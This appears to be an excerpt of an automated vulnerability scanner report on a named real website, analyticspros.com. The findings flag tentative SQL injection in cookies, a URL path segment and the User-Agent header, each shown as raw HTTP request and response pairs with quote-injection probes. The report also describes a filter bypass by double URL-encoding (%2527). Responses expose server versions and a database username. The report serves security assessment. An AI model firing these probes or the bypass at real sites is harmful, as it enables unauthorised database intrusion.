Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 06 Nov 2010 06:32:18 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/89-dont-kill-the-messenger.html%2527%2527?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html?start=15
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 06 Nov 2010 06:32:19 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:32:21 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:32:21 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23848


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.115. http://www.analyticspros.com/blog/googleanalytics/89-dont-kill-the-messenger.html [__utmz cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/89-dont-kill-the-messenger.html

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmz cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/googleanalytics/89-dont-kill-the-messenger.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=15
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)'; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 23:45:07 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/89-dont-kill-the-messenger.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=15
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)''; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 23:45:20 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.116. http://www.analyticspros.com/blog/googleanalytics/89-dont-kill-the-messenger.html [apros2.0_tpl cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/89-dont-kill-the-messenger.html

Issue detail

The apros2.0_tpl cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the apros2.0_tpl cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the apros2.0_tpl cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/googleanalytics/89-dont-kill-the-messenger.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=15
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0%2527; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 23:56:57 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/89-dont-kill-the-messenger.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=15
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0%2527%2527; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 23:57:00 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.117. http://www.analyticspros.com/blog/googleanalytics/91-google-analytics-cookies-and-domains.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/91-google-analytics-cookies-and-domains.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog'/googleanalytics/91-google-analytics-cookies-and-domains.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html?start=15
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 404 Component not found
Date: Sat, 06 Nov 2010 06:29:28 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Sat, 06 Nov 2010 06:29:28 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 3015

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...
<title>404 - Error: 404</title>
...[SNIP]...

Request 2

GET /blog''/googleanalytics/91-google-analytics-cookies-and-domains.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html?start=15
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:29:28 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.118. http://www.analyticspros.com/blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)'
Connection: close
Referer: http://www.analyticspros.com/blog.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 05:54:07 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)''
Connection: close
Referer: http://www.analyticspros.com/blog.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 05:54:09 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 05:54:09 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 05:54:09 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37533


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.119. http://www.analyticspros.com/blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html [__utma cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the __utma cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1%2527; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 23:49:04 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1%2527%2527; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 23:49:13 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Wed, 26-Oct-2011 23:49:27 GMT; path=/
Last-Modified: Fri, 05 Nov 2010 23:49:28 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37533


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.120. http://www.analyticspros.com/blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html [__utmc cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141'; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 05:45:07 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141''; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 05:45:08 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 05:45:11 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 05:45:11 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37532


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.121. http://www.analyticspros.com/blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html [apros2.0_tpl cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html

Issue detail

The apros2.0_tpl cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the apros2.0_tpl cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the apros2.0_tpl cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0%2527; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 05:46:05 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html
